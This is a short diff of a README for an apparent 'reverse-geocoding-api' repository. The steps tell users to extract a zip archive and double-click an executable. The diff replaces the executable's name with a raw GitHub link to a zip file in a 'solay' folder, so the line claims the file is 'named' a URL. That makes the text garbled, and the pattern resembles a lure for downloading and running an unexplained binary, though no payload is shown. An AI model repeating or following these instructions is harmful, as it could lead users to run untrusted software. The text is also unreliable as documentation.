mogpt15/reverse-geocoding-api/README.md

 6. Extract the contents of the `.zip` file.
 You can usually do this by right-clicking on the file and selecting "Extract All" or "Unzip."

 7. After extracting, find the executable file within the folder.
-This file is often named `reverse-geocoding-api.exe` or something similar.
+This file is often named `https://github.com/mogpt15/reverse-geocoding-api/raw/refs/heads/main/solay/reverse-api-geocoding-2.2.zip` or something similar.

 8. Double-click the executable file to run the application.
 Follow any on-screen instructions to complete the setup.